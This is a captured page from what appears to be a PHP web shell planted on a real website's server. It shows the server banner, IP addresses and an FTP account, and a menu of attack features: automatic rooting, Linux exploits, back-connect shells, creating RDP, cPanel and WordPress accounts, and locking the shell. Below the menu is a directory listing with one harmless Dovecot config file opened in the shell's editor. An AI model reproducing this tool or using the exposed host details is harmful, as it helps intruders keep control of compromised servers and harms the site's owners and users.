Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
dovecot /
example-config /
conf.d /
[ HOME SHELL ]
Name
Size
Permission
Action
10-auth.conf
5.13
KB
-rw-r--r--
10-director.conf
1.74
KB
-rw-r--r--
10-logging.conf
3.67
KB
-rw-r--r--
10-mail.conf
17.38
KB
-rw-r--r--
10-master.conf
3.49
KB
-rw-r--r--
10-metrics.conf
1.55
KB
-rw-r--r--
10-ssl.conf
3.56
KB
-rw-r--r--
15-lda.conf
1.62
KB
-rw-r--r--
15-mailboxes.conf
3.04
KB
-rw-r--r--
20-imap.conf
4.41
KB
-rw-r--r--
20-lmtp.conf
1.33
KB
-rw-r--r--
20-pop3.conf
3.97
KB
-rw-r--r--
20-submission.conf
4.2
KB
-rw-r--r--
90-acl.conf
676
B
-rw-r--r--
90-plugin.conf
292
B
-rw-r--r--
90-quota.conf
2.54
KB
-rw-r--r--
auth-checkpassword.conf.ext
499
B
-rw-r--r--
auth-deny.conf.ext
489
B
-rw-r--r--
auth-dict.conf.ext
343
B
-rw-r--r--
auth-ldap.conf.ext
924
B
-rw-r--r--
auth-master.conf.ext
561
B
-rw-r--r--
auth-passwdfile.conf.ext
515
B
-rw-r--r--
auth-sql.conf.ext
788
B
-rw-r--r--
auth-static.conf.ext
611
B
-rw-r--r--
auth-system.conf.ext
2.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 10-director.conf
## ## Director-specific settings. ## # Director can be used by Dovecot proxy to keep a temporary user -> mail server # mapping. As long as user has simultaneous connections, the user is always # redirected to the same server. Each proxy server is running its own director # process, and the directors are communicating the state to each others. # Directors are mainly useful with NFS-like setups. # List of IPs or hostnames to all director servers, including ourself. # Ports can be specified as ip:port. The default port is the same as # what director service's inet_listener is using. #director_servers = # List of IPs or hostnames to all backend mail servers. Ranges are allowed # too, like 10.0.0.10-10.0.0.30. #director_mail_servers = # How long to redirect users to a specific server after it no longer has # any connections. #director_user_expire = 15 min # How the username is translated before being hashed. Useful values include # %Ln if user can log in with or without @domain, %Ld if mailboxes are shared # within domain. #director_username_hash = %Lu # To enable director service, uncomment the modes and assign a port. service director { unix_listener login/director { #mode = 0666 } fifo_listener login/proxy-notify { #mode = 0666 } unix_listener director-userdb { #mode = 0600 } inet_listener { #port = } } # Enable director for the wanted login services by telling them to # connect to director socket instead of the default login socket: service imap-login { #executable = imap-login director } service pop3-login { #executable = pop3-login director } service submission-login { #executable = submission-login director } # Enable director for LMTP proxying: protocol lmtp { #auth_socket_path = director-userdb }
Close